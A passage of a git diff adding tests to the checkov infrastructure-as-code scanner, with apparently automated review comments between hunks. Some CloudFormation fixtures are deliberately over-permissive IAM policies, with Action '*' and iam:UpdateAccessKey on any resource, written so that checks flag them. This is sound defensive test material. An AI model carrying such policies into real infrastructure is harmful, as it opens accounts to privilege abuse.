@@ -0,0 +1,40 @@ +import os +import unittest + +from checkov.cloudformation.checks.resource.aws.SagemakerNotebookInstanceAllowsIMDSv2 import check +from checkov.cloudformation.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestSagemakerNotebookInstanceAllowsIMDSv2(unittest.TestCase): + + def test_summary(self): + runner = Runner() + current_dir = os.path.dirname(os.path.realpath(__file__)) + + test_files_dir = current_dir + "/example_SagemakerNotebookInstanceAllowsIMDSv2" + report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) + summary = report.get_summary() + + passing_resources = { + "AWS::SageMaker::NotebookInstance.BasicNotebookInstancePass", + } + failing_resources = { + "AWS::SageMaker::NotebookInstance.BasicNotebookInstanceFail1", + "AWS::SageMaker::NotebookInstance.BasicNotebookInstanceFail2", + } + + passed_check_resources = set([c.resource for c in report.passed_checks]) + failed_check_resources = set([c.resource for c in report.failed_checks]) + + self.assertEqual(summary["passed"], 1) + self.assertEqual(summary["failed"], 2) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml new file mode 100644 index 00000000000..edcaf4cb2bc --- /dev/null +++ b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml 
@@ -0,0 +1,8 @@
+pass:
+ - "AWS::SageMaker::NotebookInstance.aws_sagemaker_notebook_instance_pass"
+ - "AWS::SageMaker::NotebookInstance.aws_sagemaker_notebook_instance_pass2"
+fail:
+ - "AWS::SageMaker::NotebookInstance.aws_sagemaker_notebook_instance_fail"
+evaluated_keys:
+ - 'AssumeRolePolicyDocument/Statement[?(@/Effect == Allow)]/Action[*]'
+ - 'resource_type'
diff --git a/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/template.yaml b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/template.yaml
new file mode 100644
index 00000000000..62879334133
--- /dev/null
+++ b/tests/cloudformation/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/template.yaml
@@ -0,0 +1,64 @@
+Resources:
+ aws_sagemaker_notebook_instance_pass:
+ Type: AWS::SageMaker::NotebookInstance
+ Properties:
+ NotebookInstanceName: my-notebook-instance
+ InstanceType: ""
+ RoleArn: !GetAtt aws_iam_role.Arn
+
+ aws_iam_role:
+ Type: AWS::IAM::Role
+ Properties:
+ AssumeRolePolicyDocument:
+ Version: '2012-10-17'
+ Statement:
+ - Effect: Allow
+ Principal:
+ Service: sagemaker.amazonaws.com
+ Action: sts:AssumeRole
+
+ aws_sagemaker_notebook_instance_pass2:
+ Type: AWS::SageMaker::NotebookInstance
+ Properties:
+ NotebookInstanceName: my-notebook-instance
+ ServiceToken: ""
+ RoleArn: !GetAtt aws_iam_role2.Arn
+
+ aws_iam_role2:
+ Type: AWS::IAM::Role
+ Properties:
+ AssumeRolePolicyDocument:
+ Version: '2012-10-17'
+ Statement:
+ - Effect: Allow
+ Principal:
+ Service: sagemaker.amazonaws.com
+ Action: sts:AssumeRole
+ Policies:
+ - PolicyName: my-policy
+ PolicyDocument:
+ Version: '2012-10-17'
+ Statement:
+ - Effect: Allow
+ Action: sagemaker:*
+ Resource: !Sub 'arn:aws:sagemaker:${AWS::Region}:${AWS::AccountId}:notebook-instance/*'
+ Condition:
+ IpAddress:
+ 'aws:SourceIp': '192.0.2.0/24'
+
+ aws_sagemaker_notebook_instance_fail:
+ Type: AWS::SageMaker::NotebookInstance
+ Properties:
+ NotebookInstanceName: my-notebook-instance
+ RoleArn: !GetAtt aws_iam_role3.Arn
+
+ aws_iam_role3:
+ Type: AWS::IAM::Role
+ Properties:
+ AssumeRolePolicyDocument:
+ Version: '2012-10-17'
+ Statement:
+ - Effect: Allow
+ Principal:
+ Service: sagemaker.amazonaws.com
+ Action: '*'
diff --git a/tests/cloudformation/graph/checks/test_yaml_policies.py b/tests/cloudformation/graph/checks/test_yaml_policies.py
index bd1559557ae..38ba819fcc7 100644
--- a/tests/cloudformation/graph/checks/test_yaml_policies.py
+++ b/tests/cloudformation/graph/checks/test_yaml_policies.py
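Review bot: The only failing fixture fails because `aws_iam_role3`'s trust policy has `Action: '*'`, so nothing in this template exercises the "all traffic" part of the check's name — the single `aws:SourceIp` condition lives in `aws_iam_role2`'s inline policy, and `aws_iam_role` passes with no inline policy at all. Worth adding a notebook whose role grants `sagemaker:*` with no `Condition`, and a trust statement whose `Action` is a list such as `[sts:AssumeRole, '*']`, so the `Action[*]` evaluated key named in the sibling expected.yaml is covered for the list form as well as the scalar one. `InstanceType: ""` and `ServiceToken: ""` read as filler (`ServiceToken` is, as far as I can tell, a custom-resource property rather than a NotebookInstance one), and a comment on each notebook stating why it passes or fails, e.g. `# passes: trust policy limited to sts:AssumeRole`, would make the fixture self-explaining.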
@@ -39,6 +39,9 @@ def test_MSKClusterLogging(self): def test_LambdaFunction(self): self.go("LambdaFunction") + def test_SageMakerIAMPolicyOverlyPermissiveToAllTraffic(self): + self.go("SageMakerIAMPolicyOverlyPermissiveToAllTraffic") + def test_ALBRedirectHTTPtoHTTPS(self): self.go("ALBRedirectHTTPtoHTTPS") diff --git a/tests/cloudformation/image_referencer/resources/aws/sagemaker_image_version.yaml b/tests/cloudformation/image_referencer/resources/aws/sagemaker_image_version.yaml new file mode 100644 index 00000000000..96d34fe4c73 --- /dev/null +++ b/tests/cloudformation/image_referencer/resources/aws/sagemaker_image_version.yaml @@ -0,0 +1,23 @@ +AWSTemplateFormatVersion: '2010-09-09' +Resources: + MySageMakerImageVersion: + Type: AWS::SageMaker::ImageVersion + Properties: + Alias: "latest" + Aliases: + - "stable" + - "recommended" + BaseImage: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-base-image:1.0.0" + Horovod: false + ImageName: "my-sagemaker-image" + JobType: "TRAINING" + MLFramework: "TensorFlow" + Processor: "CPU" + ProgrammingLang: "Python" + ReleaseNotes: "Initial release of the custom SageMaker image version." + VendorGuidance: "NOT_PROVIDED" + SageMakerImage: + Type: AWS::SageMaker::Image + Properties: + ImageName: "my-sagemaker-image" + RoleArn: "arn:aws:iam::123456789012:role/SageMakerRole" diff --git a/tests/cloudformation/image_referencer/resources/aws/sagemaker_model.yaml b/tests/cloudformation/image_referencer/resources/aws/sagemaker_model.yaml new file mode 100644 index 00000000000..f6575c6e4cc --- /dev/null +++ b/tests/cloudformation/image_referencer/resources/aws/sagemaker_model.yaml 
@@ -0,0 +1,45 @@ +AWSTemplateFormatVersion: '2010-09-09' +Resources: + MySageMakerModel: + Type: AWS::SageMaker::Model + Properties: + ModelName: "my-single-container-model" + ExecutionRoleArn: "arn:aws:iam::123456789012:role/SageMakerRole" + PrimaryContainer: + Image: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-inference-image:latest" + ModelDataUrl: "s3://my-bucket/path/to/model.tar.gz" + Environment: + VAR1: "value1" + VAR2: "value2" + EnableNetworkIsolation: true + VpcConfig: + Subnets: + - "subnet-0123456789abcdef0" + - "subnet-0123456789abcdef1" + SecurityGroupIds: + - "sg-0123456789abcdef0" + MySageMakerModel2: + Type: AWS::SageMaker::Model + Properties: + ModelName: "my-multi-container-model" + ExecutionRoleArn: "arn:aws:iam::123456789012:role/SageMakerRole" + Containers: + - Image: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-inference-image-1:latest" + ModelDataUrl: "s3://my-bucket/path/to/model-1.tar.gz" + Environment: + VAR1: "value1" + VAR2: "value2" + - Image: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-inference-image-2:latest" + ModelDataUrl: "s3://my-bucket/path/to/model-2.tar.gz" + Environment: + VAR3: "value3" + VAR4: "value4" + InferenceExecutionConfig: + Mode: "Serial" + EnableNetworkIsolation: true + VpcConfig: + Subnets: + - "subnet-0123456789abcdef0" + - "subnet-0123456789abcdef1" + SecurityGroupIds: + - "sg-0123456789abcdef0" diff --git a/tests/cloudformation/image_referencer/test_runner_aws_resources.py b/tests/cloudformation/image_referencer/test_runner_aws_resources.py index 6921de5ced6..1bb45bf20f9 100644 --- a/tests/cloudformation/image_referencer/test_runner_aws_resources.py +++ b/tests/cloudformation/image_referencer/test_runner_aws_resources.py 
@@ -257,3 +257,94 @@ def test_lightsail_resources(mocker: MockerFixture, graph_framework): assert len(sca_image_report.skipped_checks) == 0 assert len(sca_image_report.parsing_errors) == 0 + +@pytest.mark.parametrize("graph_framework", GRAPH_FRAMEWORKS) +def test_sagemaker_image_version_resources(mocker: MockerFixture, graph_framework): + # given + file_name = "sagemaker_image_version.yaml" + image_name = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-base-image:1.0.0" + code_lines = "4-19" + test_file = RESOURCES_PATH / file_name + runner_filter = RunnerFilter(run_image_referencer=True) + + mocker.patch( + "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async", + side_effect=mock_get_image_cached_result_async, + ) + mocker.patch( + "checkov.common.images.image_referencer.get_license_statuses_async", + side_effect=mock_get_empty_license_statuses_async, + ) + + # when + with mock.patch.dict('os.environ', {'CHECKOV_GRAPH_FRAMEWORK': graph_framework}): + reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) + + # then + assert len(reports) == 2 + + tf_report = next(report for report in reports if report.check_type == CheckType.CLOUDFORMATION) + sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) + + assert len(tf_report.resources) == 2 + assert len(tf_report.passed_checks) == 0 + assert len(tf_report.failed_checks) == 0 + assert len(tf_report.skipped_checks) == 0 + assert len(tf_report.parsing_errors) == 0 + + assert len(sca_image_report.resources) == 1 + assert sca_image_report.resources == {f"{file_name} ({image_name} lines:{code_lines} (sha256:2460522297)).go"} + assert len(sca_image_report.passed_checks) == 0 + assert len(sca_image_report.failed_checks) == 3 + assert len(sca_image_report.skipped_checks) == 0 + assert len(sca_image_report.parsing_errors) == 0 + + +@pytest.mark.parametrize("graph_framework", GRAPH_FRAMEWORKS) +def 
test_sagemaker_model_resources(mocker: MockerFixture, graph_framework): + # given + file_name = "sagemaker_model.yaml" + image_name_1 = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-inference-image:latest" + image_name_2 = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-inference-image-1:latest" + image_name_3 = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-inference-image-2:latest" + code_lines_1 = "4-21" + code_lines_2 = "22-46" + code_lines_3 = "22-46" + test_file = RESOURCES_PATH / file_name + runner_filter = RunnerFilter(run_image_referencer=True) + + mocker.patch( + "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async", + side_effect=mock_get_image_cached_result_async, + ) + mocker.patch( + "checkov.common.images.image_referencer.get_license_statuses_async", + side_effect=mock_get_empty_license_statuses_async, + ) + + # when + with mock.patch.dict('os.environ', {'CHECKOV_GRAPH_FRAMEWORK': graph_framework}): + reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) + + # then + assert len(reports) == 2 + + tf_report = next(report for report in reports if report.check_type == CheckType.CLOUDFORMATION) + sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) + + assert len(tf_report.resources) == 2 + assert len(tf_report.passed_checks) == 2 + assert len(tf_report.failed_checks) == 0 + assert len(tf_report.skipped_checks) == 0 + assert len(tf_report.parsing_errors) == 0 + + assert len(sca_image_report.resources) == 3 + assert sca_image_report.resources == { + f"{file_name} ({image_name_1} lines:{code_lines_1} (sha256:2460522297)).go", + f"{file_name} ({image_name_2} lines:{code_lines_2} (sha256:2460522297)).go", + f"{file_name} ({image_name_3} lines:{code_lines_3} (sha256:2460522297)).go", + } + assert len(sca_image_report.passed_checks) == 0 + assert len(sca_image_report.failed_checks) == 9 + assert len(sca_image_report.skipped_checks) == 0 + 
assert len(sca_image_report.parsing_errors) == 0 diff --git a/tests/cloudformation/runner/resources/double_statement_cloudsplaining.yml b/tests/cloudformation/runner/resources/double_statement_cloudsplaining.yml new file mode 100644 index 00000000000..96e5c0dd8bb --- /dev/null +++ b/tests/cloudformation/runner/resources/double_statement_cloudsplaining.yml @@ -0,0 +1,22 @@ +AWSTemplateFormatVersion: 2010-09-09 +Description: IAM policy +Resources: + MyResource: + Type: 'AWS::IAM::Policy' + Properties: + PolicyName: root + PolicyDocument: + Version: 2012-10-17 + Statement: + - Effect: Allow + Action: + - 's3:GetObject' + - 's3:PutObject' + Resource: '*' + - Effect: Allow + Action: 'iam:UpdateAccessKey' + Resource: '*' + Roles: + - example_role + Users: + - admin \ No newline at end of file diff --git a/tests/cloudformation/runner/test_runner.py b/tests/cloudformation/runner/test_runner.py index ef055e326de..f2aface4866 100644 --- a/tests/cloudformation/runner/test_runner.py +++ b/tests/cloudformation/runner/test_runner.py 
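Review bot: `code_lines_2` and `code_lines_3` are both `"22-46"` for a fixture that the sagemaker_model.yaml hunk header shows is 45 lines long, so the expected range runs one line past the file and the two container images of `MySageMakerModel2` differ only by image name; if the CloudFormation parser reports end-exclusive, per-resource ranges this is just runner behaviour, but a comment such as `# line ranges are per resource, not per container, and end-exclusive` would stop the next reader treating it as a typo. `tf_report` is a name carried over from the Terraform variant of this test — here it holds the `CheckType.CLOUDFORMATION` report, so `cfn_report` would be accurate. Both new functions pin `passed_checks`/`failed_checks` counts without naming the checks, which makes a failure after an unrelated new check hard to diagnose; asserting the set of `check_id`s would be more robust.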
@@ -433,6 +433,17 @@ def test_parsing_error_yaml(self): runner_filter=RunnerFilter(framework='cloudformation')) self.assertEqual(report.parsing_errors, [scan_file_path]) + def test_double_statement(self): + current_dir = os.path.dirname(os.path.realpath(__file__)) + scan_file_path = os.path.join(current_dir, "resources", "double_statement_cloudsplaining.yml") + runner = Runner(db_connector=self.db_connector()) + report = runner.run(root_folder=None, external_checks_dir=None, files=[scan_file_path], + runner_filter=RunnerFilter(framework=['cloudformation'])) + self.assertEqual(len(report.failed_checks), 5) + id_and_key = [(x.check_id, x.check_result.get('evaluated_keys')) for x in report.failed_checks] + self.assertIn(('CKV_AWS_107', ['Properties/PolicyDocument/Statement/[1]/Action']), id_and_key) + self.assertIn(('CKV_AWS_111', ['Properties/PolicyDocument/Statement/[0]/Action/[1]/']), id_and_key) + def test_skip_sub_dict_json(self): current_dir = os.path.dirname(os.path.realpath(__file__)) scan_file_path = os.path.join(current_dir, "resources", "skip_sub_dict.json") diff --git a/tests/cloudformation/test_graph_manager.py b/tests/cloudformation/test_graph_manager.py index e88defc8407..3a47eff1cf7 100644 --- a/tests/cloudformation/test_graph_manager.py +++ b/tests/cloudformation/test_graph_manager.py @@ -14,7 +14,7 @@ def test_build_graph_from_source_directory_no_rendering(self): root_dir = os.path.realpath(os.path.join(TEST_DIRNAME, "./runner/resources")) graph_manager = CloudformationGraphManager(db_connector=NetworkxConnector()) local_graph, definitions = graph_manager.build_graph_from_source_directory(root_dir, render_variables=False, - excluded_paths=["skip.*"]) + excluded_paths=["skip.*", "double_state.*"]) expected_resources_by_file = { os.path.join(root_dir, "no_properties.yaml"): [ 
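Review bot: `self.assertEqual(len(report.failed_checks), 5)` runs every CloudFormation check against an `AWS::IAM::Policy` with `Resource: '*'`, so any future IAM check added to the registry will break this test for reasons unrelated to the double-statement fix; narrowing the run with `RunnerFilter(framework=['cloudformation'], checks=['CKV_AWS_107', 'CKV_AWS_111'])` or asserting `{x.check_id for x in report.failed_checks} >= {'CKV_AWS_107', 'CKV_AWS_111'}` pins what the test is actually about. The two pinned `evaluated_keys` also have different shapes — `Statement/[1]/Action` versus `Statement/[0]/Action/[1]/` with a trailing slash — and freezing both in a test turns that inconsistency into a contract; if the trailing slash is an artifact of how the path is assembled rather than intentional, this is the moment to normalise it. A comment naming the statements (`# statement 0 -> s3 write on '*' (presumably CKV_AWS_111); statement 1 -> iam:UpdateAccessKey (CKV_AWS_107)`) would explain where the indices come from.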
diff --git a/tests/common/integration_features/test_custom_policies_integration.py b/tests/common/integration_features/test_custom_policies_integration.py index bb0ad52f72a..b37ebf9ba96 100644 --- a/tests/common/integration_features/test_custom_policies_integration.py +++ b/tests/common/integration_features/test_custom_policies_integration.py @@ -22,6 +22,7 @@ def tearDown(self) -> None: get_graph_checks_registry("cloudformation").checks = [] get_graph_checks_registry("terraform").checks = [] get_graph_checks_registry("kubernetes").checks = [] + get_graph_checks_registry("bicep").checks = [] def test_integration_valid(self): instance = BcPlatformIntegration() @@ -218,11 +219,14 @@ def test_pre_scan_with_cloned_checks(self): cfn_registry = get_graph_checks_registry("cloudformation").checks tf_registry = get_graph_checks_registry("terraform").checks k8s_registry = get_graph_checks_registry("kubernetes").checks + bicep_registry = get_graph_checks_registry("bicep").checks self.assertEqual(1, len(custom_policies_integration.bc_cloned_checks)) self.assertEqual('kpande_AZR_1648821862291', tf_registry[0].id, cfn_registry[0].id) self.assertEqual('kpande_AZR_1648821862291', tf_registry[0].bc_id, cfn_registry[0].bc_id) self.assertEqual('kpande_kubernetes_1650378013211', k8s_registry[0].id) self.assertEqual('kpande_kubernetes_1650378013211', k8s_registry[0].bc_id) + self.assertEqual('kpande_bicep_1650378013212', bicep_registry[0].id) + self.assertEqual('kpande_bicep_1650378013212', bicep_registry[0].bc_id) def test_post_runner_with_cloned_checks(self): instance = BcPlatformIntegration() 
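Review bot: `bicep_registry[0].id` is indexed before anything proves the bicep registry received a check, so a regression in the bicep cloning path surfaces as an `IndexError` rather than a readable assertion; a preceding `self.assertEqual(1, len(bicep_registry))` gives a clear failure, and the same guard would help the three existing registries. While here, the context line `self.assertEqual('kpande_AZR_1648821862291', tf_registry[0].id, cfn_registry[0].id)` passes `cfn_registry[0].id` as the assertion *message*, so the CloudFormation registry is never actually compared — the new bicep lines correctly use two arguments, and the older ones should be split into two `assertEqual` calls the same way.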
@@ -441,6 +445,23 @@ def test_policy_load_with_resources_types_as_str(self): "Terraform", "CloudFormation" ], + }, + { + "id": "policy_id_5", + "title": "Custom - ensure SQL pool valid create mode", + "severity": "HIGH", + "category": "General", + "guideline": "Custom - ensure", + "code": json.dumps({ + "value": "Recovery", + "operator": "equals", + "attribute": "createMode", + "cond_type": "attribute", + "resource_types": [ + "Microsoft.Synapse/workspaces/sqlPools" + ] + }), + "benchmarks": {}, } ] @@ -513,6 +534,23 @@ def mock_custom_policies_response(): "frameworks": [ "Kubernetes" ] + }, + { + "id": "kpande_bicep_1650378013212", + "code": "{\"operator\":\"exists\",\"attribute\":\"spec.runAsUser.rule\",\"cond_type\":\"attribute\"," + "\"resource_types\":[\"PodSecurityPolicy\"]}", + "title": "bicep policy", + "guideline": "meaningful guideline for bicep policy", + "severity": "HIGH", + "pcSeverity": None, + "category": "bicep", + "pcPolicyId": None, + "additionalPcPolicyIds": None, + "sourceIncidentId": None, + "benchmarks": {}, + "frameworks": [ + "bicep" + ] } ] } diff --git a/tests/common/integration_features/test_licensing_integration.py b/tests/common/integration_features/test_licensing_integration.py index 62ab6b42d20..f49d595a497 100644 --- a/tests/common/integration_features/test_licensing_integration.py +++ b/tests/common/integration_features/test_licensing_integration.py @@ -74,6 +74,8 @@ def test_constants(self): 'sast_python', 'sast_java', 'sast_javascript', + 'sast_typescript', + 'sast_golang', '3d_policy' }) diff --git a/tests/common/integration_features/test_policy_metadata_integration.py b/tests/common/integration_features/test_policy_metadata_integration.py index 9091340eaf0..d584a941303 100644 --- a/tests/common/integration_features/test_policy_metadata_integration.py +++ b/tests/common/integration_features/test_policy_metadata_integration.py 
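Review bot: The new `kpande_bicep_1650378013212` fixture is the Kubernetes policy relabelled — its `code` still targets `"resource_types":["PodSecurityPolicy"]` and `spec.runAsUser.rule`, which no Bicep resource has — so the test only proves that a policy tagged `"frameworks": ["bicep"]` is routed to the bicep registry, not that a Bicep resource type is handled. A Bicep-shaped policy, e.g. `"resource_types":["Microsoft.Synapse/workspaces/sqlPools"]` with `"attribute":"createMode"` as `policy_id_5` in the other hunk of this file already does, would exercise the realistic path. If the copy is deliberate, a comment above the entry such as `# bicep clone of the k8s policy; only framework routing is under test` makes that explicit.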
@@ -13,12 +13,15 @@ def test_filtered_policy_ids(self): instance.bc_api_key = '00000000-0000-0000-0000-000000000000::1234==' instance.customer_run_config_response = mock_customer_run_config() instance.prisma_policies_response = mock_prisma_policies_response() + instance.prisma_policies_exception_response = [mock_prisma_policies_response()[0]] metadata_integration = PolicyMetadataIntegration(instance) metadata_integration.bc_integration = instance metadata_integration.pre_scan() metadata_integration.pc_to_ckv_id_mapping - self.assertDictEqual(metadata_integration.pc_to_ckv_id_mapping, {'6960be11-e3a6-46cc-bf66-933c57c2af5d': 'CKV_AWS_212', '3dc2478c-bf25-4383-aaa1-30feb5cda586': '806079891421835264_AZR_1685557908904', 'c11ce08c-b93e-4e11-8d1c-e5a1339139d1': 'CKV_AWS_40', '0e4c576e-c934-4af3-8592-a53920e71ffb': 'CKV_AWS_53'}) + self.assertDictEqual(metadata_integration.pc_to_ckv_id_mapping, {'6960be11-e3a6-46cc-bf66-933c57c2af5d': 'CKV_AWS_212', '3dc2478c-bf25-4383-aaa1-30feb5cda586': '806079891421835264_AZR_1685557908904', 'c11ce08c-b93e-4e11-8d1c-e5a1339139d1': 'CKV_AWS_40', '0e4c576e-c934-4af3-8592-a53920e71ffb': 'CKV_AWS_53', '1234': 'CKV3_SAST_123'}) self.assertListEqual(metadata_integration.filtered_policy_ids, ['CKV_AWS_212', '806079891421835264_AZR_1685557908904', 'CKV_AWS_40', 'CKV_AWS_53', 'CKV_AZURE_122']) + self.assertListEqual(metadata_integration.filtered_exception_policy_ids, ['CKV_AWS_212']) + self.assertSetEqual(set(metadata_integration.sast_check_metadata.keys()), {'CKV3_SAST_123'}) def mock_customer_run_config(): 
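Review bot: `instance.prisma_policies_exception_response = [mock_prisma_policies_response()[0]]` picks the exception policy by position, so the later `assertListEqual(metadata_integration.filtered_exception_policy_ids, ['CKV_AWS_212'])` silently depends on the mock's list order; selecting the entry by its id with a `next(p for p in mock_prisma_policies_response() if ...)` over the policy-id field (I cannot see the mock's key names from here) makes the expectation self-evident. A one-line comment on why only `CKV3_SAST_123` is expected in `sast_check_metadata` — it is the only `CKV3_SAST_` entry in the run config below — would help the next reader.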
@@ -87,6 +90,22 @@ def mock_customer_run_config(): "3dc2478c-bf25-4383-aaa1-30feb5cda586" ], "benchmarks": {} + }, + "CKV3_SAST_123": { + "id": "BC_SAST_123", + "title": "sast", + "guideline": "https://docs.bridgecrew.io/docs/abc", + "severity": "LOW", + "pcSeverity": "LOW", + "category": "Networking", + "checkovId": "CKV3_SAST_123", + "constructiveTitle": "sast", + "descriptiveTitle": "sast", + "pcPolicyId": "1234", + "additionalPcPolicyIds": [ + "1234" + ], + "benchmarks": {} } }, "customPolicies": [ diff --git a/tests/common/integration_features/test_repo_config_integration.py b/tests/common/integration_features/test_repo_config_integration.py index a847c461be9..3634ffa4cc0 100644 --- a/tests/common/integration_features/test_repo_config_integration.py +++ b/tests/common/integration_features/test_repo_config_integration.py @@ -792,6 +792,27 @@ def test_skip_paths_non_matching(self): repo_config_integration._set_exclusion_paths(vcs_config) self.assertEqual(repo_config_integration.skip_paths, set()) + def test_skip_paths_no_repos(self): + vcs_config = { + "scannedFiles": { + "sections": [ + { + "repos": [], + "rule": { + "excludePaths": [] + }, + "isDefault": True + } + ] + } + } + + instance = BcPlatformIntegration() + instance.repo_id = 'org/repo' + repo_config_integration = RepoConfigIntegration(instance) + repo_config_integration._set_exclusion_paths(vcs_config) + self.assertEqual(repo_config_integration.skip_paths, set()) + def test_skip_paths_multiple_one_match(self): vcs_config = { "scannedFiles": { diff --git a/tests/common/integration_features/test_suppressions_integration.py b/tests/common/integration_features/test_suppressions_integration.py index c5c00cb994d..056480dbfd3 100644 --- a/tests/common/integration_features/test_suppressions_integration.py +++ b/tests/common/integration_features/test_suppressions_integration.py 
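Review bot: The new `CKV3_SAST_123` entry sets `"additionalPcPolicyIds": ["1234"]` to the same value as `"pcPolicyId": "1234"`, so the mapping assertion `'1234': 'CKV3_SAST_123'` passes whether the integration reads the primary id, the additional ids, or both — a distinct second id such as `"additionalPcPolicyIds": ["5678"]`, asserted in the mapping, would tell the two code paths apart. The `"guideline"` URL and `"category": "Networking"` are arbitrary for a SAST check, which is fine for a fixture but deserves a `# synthetic SAST entry; values are placeholders` comment.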
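Review bot: With `"excludePaths": []` the new test cannot tell whether a default section with `"repos": []` is ignored or applied with nothing to exclude — both outcomes yield `set()`; giving the rule a path, e.g. `"excludePaths": ["vendor/**"]`, and asserting the intended result would pin the semantics of `isDefault` when no repositories are listed. If the hunk's purpose is only to guard against a crash on an empty `repos` list, as the test name suggests, a comment saying so (`# empty repos list must not raise`) keeps a future reader from "fixing" the empty expectation.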
@@ -226,6 +226,37 @@ def test_policy_suppression(self): self.assertTrue(suppressions_integration._check_suppression(record1, suppression)) self.assertFalse(suppressions_integration._check_suppression(record2, suppression)) + def test_policy_v2_suppression(self): + instance = BcPlatformIntegration() + + suppressions_integration = SuppressionsIntegration(instance) + suppressions_integration._init_repo_regex() + + suppression = { + "ruleType": "policy", + "checkovPolicyIds": ["CKV_AWS_79", "CKV_AWS_80"], + } + + record1 = Record(check_id='CKV_AWS_79', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record2 = Record(check_id='CKV_AWS_80', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record3 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + + self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression)) + self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression)) + self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression)) + def test_suppress_by_policy_BC_VUL_2(self): instance = BcPlatformIntegration() 
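Review bot: The test covers matching and non-matching `checkovPolicyIds` but not a v2 policy suppression whose `checkovPolicyIds` is empty or absent, which is the case most likely to be mis-handled (an empty list must not match every record); one more `suppression` with `"checkovPolicyIds": []` asserted `False` for `record1` would close that gap. The three `Record(...)` constructions with a dozen `None`s are repeated again in the two repository tests below — a small module-level helper `_record(check_id)` would cut the noise considerably. The enclosing test class continues outside the hunk.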
@@ -818,6 +849,45 @@ def test_account_suppression(self): self.assertTrue(suppressions_integration._check_suppression(record1, suppression)) self.assertFalse(suppressions_integration._check_suppression(record2, suppression)) + def test_repo_v2_suppression(self): + instance = BcPlatformIntegration() + instance.repo_id = 'org/repo' + suppressions_integration = SuppressionsIntegration(instance) + suppressions_integration._init_repo_regex() + suppression = { + "ruleType": "repository", + "repositories": [ + {"repositoryName": "org/repo"}, + {"repositoryName": "not/valid"} + ], + "checkovPolicyIds": ["CKV_AWS_18", "CKV_AWS_19"], + } + + # this is actually almost the same as a policy check, except we care about the repo name in the integration + # record details do not matter, except policy ID + record1 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record2 = Record(check_id='CKV_AWS_19', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record3 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + + self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression)) + self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression)) + self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression)) + + instance.repo_id = 'another/repo' + self.assertFalse(suppressions_integration._check_suppression_v2(record1, suppression)) + def test_account_suppression_cli_repo(self): instance = BcPlatformIntegration() instance.repo_id = 'org/repo' 
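Review bot: The final assertion reassigns `instance.repo_id = 'another/repo'` but does not call `suppressions_integration._init_repo_regex()` again, so if `_check_suppression_v2` matches `repositoryName` through the regex built at init time — which the `_init_repo_regex()` call at the top of the test suggests — the `False` may come from a stale regex rather than from the repo mismatch being detected; re-running `suppressions_integration._init_repo_regex()` after the reassignment, or constructing a second integration, makes the assertion test what it claims. The same applies to the CLI-repo variant in the next hunk, where the `1234_` prefixed names make the regex the more likely match path. I cannot see `_check_suppression_v2` from here, so this is moot if it reads `repo_id` directly.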
@@ -845,6 +915,45 @@ def test_account_suppression_cli_repo(self): self.assertTrue(suppressions_integration._check_suppression(record1, suppression)) self.assertFalse(suppressions_integration._check_suppression(record2, suppression)) + def test_repo_v2_suppression_cli_repo(self): + instance = BcPlatformIntegration() + instance.repo_id = 'org/repo' + suppressions_integration = SuppressionsIntegration(instance) + suppressions_integration._init_repo_regex() + suppression = { + "ruleType": "repository", + "repositories": [ + {"repositoryName": "1234_org/repo"}, + {"repositoryName": "1234_not/valid"} + ], + "checkovPolicyIds": ["CKV_AWS_18", "CKV_AWS_19"], + } + + # this is actually almost the same as a policy check, except we care about the repo name in the integration + # record details do not matter, except policy ID + record1 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record2 = Record(check_id='CKV_AWS_19', check_name=None, check_result=None, + code_block=None, file_path=None, 